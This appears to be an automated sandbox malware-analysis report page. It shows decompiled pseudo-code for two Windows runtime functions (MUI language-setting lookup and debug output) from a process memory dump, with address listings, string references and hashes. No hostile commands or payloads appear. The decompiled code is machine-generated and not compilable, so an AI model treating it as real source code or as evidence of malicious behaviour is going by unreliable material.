                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 01733D34 Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 96%
                                                                                                                                                                                                                                                                                                			E01733D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E01731B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E01731B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E01731B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E01731B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E01731B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L01744620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0176F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01771370(_t276, 0x1704e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0176BB40(0,  &_v68, _t170);
									if(L017343C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0176BB40(_t257,  &_v68, _t243);
								if(L017343C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01771370(_t278, 0x1704e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L01744620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0176F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01771370(_v16, 0x1704e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0176BB40(_t262,  &_v68, _t244);
								if(L017343C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01771370(_t282, 0x1704e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0176BB40(_t262,  &_v68, _t201);
							if(L017343C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L01744620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0176F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01771370(_t280, 0x1704e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0176BB40(_t267,  &_v68, _t245);
							if(L017343C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01771370(_t284, 0x1704e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0176BB40(_t267,  &_v68, _t224);
						if(L017343C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                                                                                                                                                                                                                                                                0x01733d3c
                                                                                                                                                                                                                                                                                                0x01733d42
                                                                                                                                                                                                                                                                                                0x01733d44
                                                                                                                                                                                                                                                                                                0x01733d46
                                                                                                                                                                                                                                                                                                0x01733d49
                                                                                                                                                                                                                                                                                                0x01733d4c
                                                                                                                                                                                                                                                                                                0x01733d4f
                                                                                                                                                                                                                                                                                                0x01733d52
                                                                                                                                                                                                                                                                                                0x01733d55
                                                                                                                                                                                                                                                                                                0x01733d58
                                                                                                                                                                                                                                                                                                0x01733d5b
                                                                                                                                                                                                                                                                                                0x01733d5f
                                                                                                                                                                                                                                                                                                0x01733d61
                                                                                                                                                                                                                                                                                                0x01733d66
                                                                                                                                                                                                                                                                                                0x01788213
                                                                                                                                                                                                                                                                                                0x01788218
                                                                                                                                                                                                                                                                                                0x01734085
                                                                                                                                                                                                                                                                                                0x01734088
                                                                                                                                                                                                                                                                                                0x0173408e
                                                                                                                                                                                                                                                                                                0x01734094
                                                                                                                                                                                                                                                                                                0x0173409a
                                                                                                                                                                                                                                                                                                0x017340a0
                                                                                                                                                                                                                                                                                                0x017340a6
                                                                                                                                                                                                                                                                                                0x017340a9
                                                                                                                                                                                                                                                                                                0x017340af
                                                                                                                                                                                                                                                                                                0x017340b6
                                                                                                                                                                                                                                                                                                0x017340bd
                                                                                                                                                                                                                                                                                                0x017340bd
                                                                                                                                                                                                                                                                                                0x01733d83
                                                                                                                                                                                                                                                                                                0x0178821f
                                                                                                                                                                                                                                                                                                0x01788229
                                                                                                                                                                                                                                                                                                0x01788238
                                                                                                                                                                                                                                                                                                0x01788238
                                                                                                                                                                                                                                                                                                0x0178823d
                                                                                                                                                                                                                                                                                                0x0178823d
                                                                                                                                                                                                                                                                                                0x01733da0
                                                                                                                                                                                                                                                                                                0x01733daf
                                                                                                                                                                                                                                                                                                0x01733db5
                                                                                                                                                                                                                                                                                                0x01733dba
                                                                                                                                                                                                                                                                                                0x01733dba
                                                                                                                                                                                                                                                                                                0x01733dd4
                                                                                                                                                                                                                                                                                                0x01733e94
                                                                                                                                                                                                                                                                                                0x01733eab
                                                                                                                                                                                                                                                                                                0x01733f6d
                                                                                                                                                                                                                                                                                                0x01733f84
                                                                                                                                                                                                                                                                                                0x0173406b
                                                                                                                                                                                                                                                                                                0x0173406b
                                                                                                                                                                                                                                                                                                0x0173406e
                                                                                                                                                                                                                                                                                                0x0173406e
                                                                                                                                                                                                                                                                                                0x01734070
                                                                                                                                                                                                                                                                                                0x01734074
                                                                                                                                                                                                                                                                                                0x01788351
                                                                                                                                                                                                                                                                                                0x01788351
                                                                                                                                                                                                                                                                                                0x0173407a
                                                                                                                                                                                                                                                                                                0x0173407f
                                                                                                                                                                                                                                                                                                0x0178835d
                                                                                                                                                                                                                                                                                                0x01788370
                                                                                                                                                                                                                                                                                                0x01788377
                                                                                                                                                                                                                                                                                                0x01788379
                                                                                                                                                                                                                                                                                                0x0178837c
                                                                                                                                                                                                                                                                                                0x0178837c
                                                                                                                                                                                                                                                                                                0x0178835d
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0173407f
                                                                                                                                                                                                                                                                                                0x01733f8a
                                                                                                                                                                                                                                                                                                0x01733f8d
                                                                                                                                                                                                                                                                                                0x01733f90
                                                                                                                                                                                                                                                                                                0x01733f95
                                                                                                                                                                                                                                                                                                0x0178830d
                                                                                                                                                                                                                                                                                                0x0178830f
                                                                                                                                                                                                                                                                                                0x01733f9b
                                                                                                                                                                                                                                                                                                0x01733fac
                                                                                                                                                                                                                                                                                                0x01733fae
                                                                                                                                                                                                                                                                                                0x01733fb1
                                                                                                                                                                                                                                                                                                0x01733fb1
                                                                                                                                                                                                                                                                                                0x01733fb6
                                                                                                                                                                                                                                                                                                0x01788317
                                                                                                                                                                                                                                                                                                0x0178831a
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01733fbc
                                                                                                                                                                                                                                                                                                0x01733fc1
                                                                                                                                                                                                                                                                                                0x01733fc9
                                                                                                                                                                                                                                                                                                0x01733fd7
                                                                                                                                                                                                                                                                                                0x01733fda
                                                                                                                                                                                                                                                                                                0x01733fdd
                                                                                                                                                                                                                                                                                                0x01734021
                                                                                                                                                                                                                                                                                                0x01734021
                                                                                                                                                                                                                                                                                                0x01734029
                                                                                                                                                                                                                                                                                                0x01734030
                                                                                                                                                                                                                                                                                                0x01734044
                                                                                                                                                                                                                                                                                                0x01734046
                                                                                                                                                                                                                                                                                                0x01734046
                                                                                                                                                                                                                                                                                                0x01734044
                                                                                                                                                                                                                                                                                                0x01734049
                                                                                                                                                                                                                                                                                                0x01788327
                                                                                                                                                                                                                                                                                                0x01788334
                                                                                                                                                                                                                                                                                                0x01788339
                                                                                                                                                                                                                                                                                                0x0178833c
                                                                                                                                                                                                                                                                                                0x0173404f
                                                                                                                                                                                                                                                                                                0x0173404f
                                                                                                                                                                                                                                                                                                0x0173404f
                                                                                                                                                                                                                                                                                                0x01734051
                                                                                                                                                                                                                                                                                                0x01734056
                                                                                                                                                                                                                                                                                                0x01734063
                                                                                                                                                                                                                                                                                                0x01734063
                                                                                                                                                                                                                                                                                                0x01734068
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01734068
                                                                                                                                                                                                                                                                                                0x01733fdf
                                                                                                                                                                                                                                                                                                0x01733fe2
                                                                                                                                                                                                                                                                                                0x01733fe4
                                                                                                                                                                                                                                                                                                0x01733fe7
                                                                                                                                                                                                                                                                                                0x01733fef
                                                                                                                                                                                                                                                                                                0x01734003
                                                                                                                                                                                                                                                                                                0x01734005
                                                                                                                                                                                                                                                                                                0x01734005
                                                                                                                                                                                                                                                                                                0x0173400c
                                                                                                                                                                                                                                                                                                0x01734013
                                                                                                                                                                                                                                                                                                0x01734016
                                                                                                                                                                                                                                                                                                0x01734017
                                                                                                                                                                                                                                                                                                0x0173401b
                                                                                                                                                                                                                                                                                                0x0173401e
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0173401e
                                                                                                                                                                                                                                                                                                0x01733fb6
                                                                                                                                                                                                                                                                                                0x01733eb1
                                                                                                                                                                                                                                                                                                0x01733eb4
                                                                                                                                                                                                                                                                                                0x01733eb7
                                                                                                                                                                                                                                                                                                0x01733ebc
                                                                                                                                                                                                                                                                                                0x017882a9
                                                                                                                                                                                                                                                                                                0x017882ab
                                                                                                                                                                                                                                                                                                0x01733ec2
                                                                                                                                                                                                                                                                                                0x01733ed3
                                                                                                                                                                                                                                                                                                0x01733ed5
                                                                                                                                                                                                                                                                                                0x01733ed8
                                                                                                                                                                                                                                                                                                0x01733ed8
                                                                                                                                                                                                                                                                                                0x01733edd
                                                                                                                                                                                                                                                                                                0x017882b3
                                                                                                                                                                                                                                                                                                0x017882b6
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01733ee3
                                                                                                                                                                                                                                                                                                0x01733ee8
                                                                                                                                                                                                                                                                                                0x01733eed
                                                                                                                                                                                                                                                                                                0x01733ef0
                                                                                                                                                                                                                                                                                                0x01733ef3
                                                                                                                                                                                                                                                                                                0x01733f02
                                                                                                                                                                                                                                                                                                0x01733f05
                                                                                                                                                                                                                                                                                                0x01733f08
                                                                                                                                                                                                                                                                                                0x017882c0
                                                                                                                                                                                                                                                                                                0x017882c3
                                                                                                                                                                                                                                                                                                0x017882c5
                                                                                                                                                                                                                                                                                                0x017882c8
                                                                                                                                                                                                                                                                                                0x017882d0
                                                                                                                                                                                                                                                                                                0x017882e4
                                                                                                                                                                                                                                                                                                0x017882e6
                                                                                                                                                                                                                                                                                                0x017882e6
                                                                                                                                                                                                                                                                                                0x017882ed
                                                                                                                                                                                                                                                                                                0x017882f4
                                                                                                                                                                                                                                                                                                0x017882f7
                                                                                                                                                                                                                                                                                                0x017882f8
                                                                                                                                                                                                                                                                                                0x017882fc
                                                                                                                                                                                                                                                                                                0x017882ff
                                                                                                                                                                                                                                                                                                0x017882ff
                                                                                                                                                                                                                                                                                                0x01733f0e
                                                                                                                                                                                                                                                                                                0x01733f11
                                                                                                                                                                                                                                                                                                0x01733f16
                                                                                                                                                                                                                                                                                                0x01733f1d
                                                                                                                                                                                                                                                                                                0x01733f31
                                                                                                                                                                                                                                                                                                0x01788307
                                                                                                                                                                                                                                                                                                0x01788307
                                                                                                                                                                                                                                                                                                0x01733f31
                                                                                                                                                                                                                                                                                                0x01733f39
                                                                                                                                                                                                                                                                                                0x01733f48
                                                                                                                                                                                                                                                                                                0x01733f4d
                                                                                                                                                                                                                                                                                                0x01733f50
                                                                                                                                                                                                                                                                                                0x01733f50
                                                                                                                                                                                                                                                                                                0x01733f53
                                                                                                                                                                                                                                                                                                0x01733f58
                                                                                                                                                                                                                                                                                                0x01733f65
                                                                                                                                                                                                                                                                                                0x01733f65
                                                                                                                                                                                                                                                                                                0x01733f6a
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01733f6a
                                                                                                                                                                                                                                                                                                0x01733edd
                                                                                                                                                                                                                                                                                                0x01733dda
                                                                                                                                                                                                                                                                                                0x01733ddd
                                                                                                                                                                                                                                                                                                0x01733de0
                                                                                                                                                                                                                                                                                                0x01733de5
                                                                                                                                                                                                                                                                                                0x01788245
                                                                                                                                                                                                                                                                                                0x01733deb
                                                                                                                                                                                                                                                                                                0x01733df7
                                                                                                                                                                                                                                                                                                0x01733dfc
                                                                                                                                                                                                                                                                                                0x01733dfe
                                                                                                                                                                                                                                                                                                0x01733e01
                                                                                                                                                                                                                                                                                                0x01733e01
                                                                                                                                                                                                                                                                                                0x01733e06
                                                                                                                                                                                                                                                                                                0x0178824d
                                                                                                                                                                                                                                                                                                0x0178824f
                                                                                                                                                                                                                                                                                                0x01788254
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01733e0c
                                                                                                                                                                                                                                                                                                0x01733e11
                                                                                                                                                                                                                                                                                                0x01733e16
                                                                                                                                                                                                                                                                                                0x01733e19
                                                                                                                                                                                                                                                                                                0x01733e29
                                                                                                                                                                                                                                                                                                0x01733e2c
                                                                                                                                                                                                                                                                                                0x01733e2f
                                                                                                                                                                                                                                                                                                0x0178825c
                                                                                                                                                                                                                                                                                                0x0178825f
                                                                                                                                                                                                                                                                                                0x01788261
                                                                                                                                                                                                                                                                                                0x01788264
                                                                                                                                                                                                                                                                                                0x0178826c
                                                                                                                                                                                                                                                                                                0x01788280
                                                                                                                                                                                                                                                                                                0x01788282
                                                                                                                                                                                                                                                                                                0x01788282
                                                                                                                                                                                                                                                                                                0x01788289
                                                                                                                                                                                                                                                                                                0x01788290
                                                                                                                                                                                                                                                                                                0x01788293
                                                                                                                                                                                                                                                                                                0x01788294
                                                                                                                                                                                                                                                                                                0x01788298
                                                                                                                                                                                                                                                                                                0x0178829b
                                                                                                                                                                                                                                                                                                0x0178829b
                                                                                                                                                                                                                                                                                                0x01733e35
                                                                                                                                                                                                                                                                                                0x01733e38
                                                                                                                                                                                                                                                                                                0x01733e3d
                                                                                                                                                                                                                                                                                                0x01733e44
                                                                                                                                                                                                                                                                                                0x01733e58
                                                                                                                                                                                                                                                                                                0x017882a3
                                                                                                                                                                                                                                                                                                0x017882a3
                                                                                                                                                                                                                                                                                                0x01733e58
                                                                                                                                                                                                                                                                                                0x01733e60
                                                                                                                                                                                                                                                                                                0x01733e6f
                                                                                                                                                                                                                                                                                                0x01733e74
                                                                                                                                                                                                                                                                                                0x01733e77
                                                                                                                                                                                                                                                                                                0x01733e77
                                                                                                                                                                                                                                                                                                0x01733e7a
                                                                                                                                                                                                                                                                                                0x01733e7f
                                                                                                                                                                                                                                                                                                0x01733e8c
                                                                                                                                                                                                                                                                                                0x01733e8c
                                                                                                                                                                                                                                                                                                0x01733e91
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01733e91

                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                • WindowsExcludedProcs, xrefs: 01733D6F
                                                                                                                                                                                                                                                                                                • Kernel-MUI-Language-Allowed, xrefs: 01733DC0
                                                                                                                                                                                                                                                                                                • Kernel-MUI-Language-Disallowed, xrefs: 01733E97
                                                                                                                                                                                                                                                                                                • Kernel-MUI-Number-Allowed, xrefs: 01733D8C
                                                                                                                                                                                                                                                                                                • Kernel-MUI-Language-SKU, xrefs: 01733F70
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                                                                                                                                                                • API String ID: 0-258546922
                                                                                                                                                                                                                                                                                                • Opcode ID: d1450d086018bb218e16f3788cdc5fdb11dba08f2051b2bbe5d1b414fb8a21da
                                                                                                                                                                                                                                                                                                • Instruction ID: ba981adc37b42c237cdd7e03a195dd795df4d6d5a354833affd30c5abe50d6cb
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d1450d086018bb218e16f3788cdc5fdb11dba08f2051b2bbe5d1b414fb8a21da
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2CF15E72D40219EFCB26DF98C984AEEFBB9FF58650F54006AE905E7255D7349E00CBA0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0172B171 Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 78%
                                                                                                                                                                                                                                                                                                			E0172B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x17ff7a8);
				E0177D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0177D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0176D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0176F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0177DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0176B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												L0176B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0176E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0176A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                                                                                                                                                                                                                                                                0x0172b171
                                                                                                                                                                                                                                                                                                0x0172b171
                                                                                                                                                                                                                                                                                                0x0172b171
                                                                                                                                                                                                                                                                                                0x0172b171
                                                                                                                                                                                                                                                                                                0x0172b171
                                                                                                                                                                                                                                                                                                0x0172b176
                                                                                                                                                                                                                                                                                                0x0172b17b
                                                                                                                                                                                                                                                                                                0x0172b180
                                                                                                                                                                                                                                                                                                0x0172b186
                                                                                                                                                                                                                                                                                                0x0172b18f
                                                                                                                                                                                                                                                                                                0x0172b198
                                                                                                                                                                                                                                                                                                0x0172b1a4
                                                                                                                                                                                                                                                                                                0x0172b1aa
                                                                                                                                                                                                                                                                                                0x01784802
                                                                                                                                                                                                                                                                                                0x01784802
                                                                                                                                                                                                                                                                                                0x01784805
                                                                                                                                                                                                                                                                                                0x0178480c
                                                                                                                                                                                                                                                                                                0x0178480e
                                                                                                                                                                                                                                                                                                0x0172b1d1
                                                                                                                                                                                                                                                                                                0x0172b1d3
                                                                                                                                                                                                                                                                                                0x0172b1de
                                                                                                                                                                                                                                                                                                0x0172b1de
                                                                                                                                                                                                                                                                                                0x01784817
                                                                                                                                                                                                                                                                                                0x0178481e
                                                                                                                                                                                                                                                                                                0x01784820
                                                                                                                                                                                                                                                                                                0x01784822
                                                                                                                                                                                                                                                                                                0x01784822
                                                                                                                                                                                                                                                                                                0x01784824
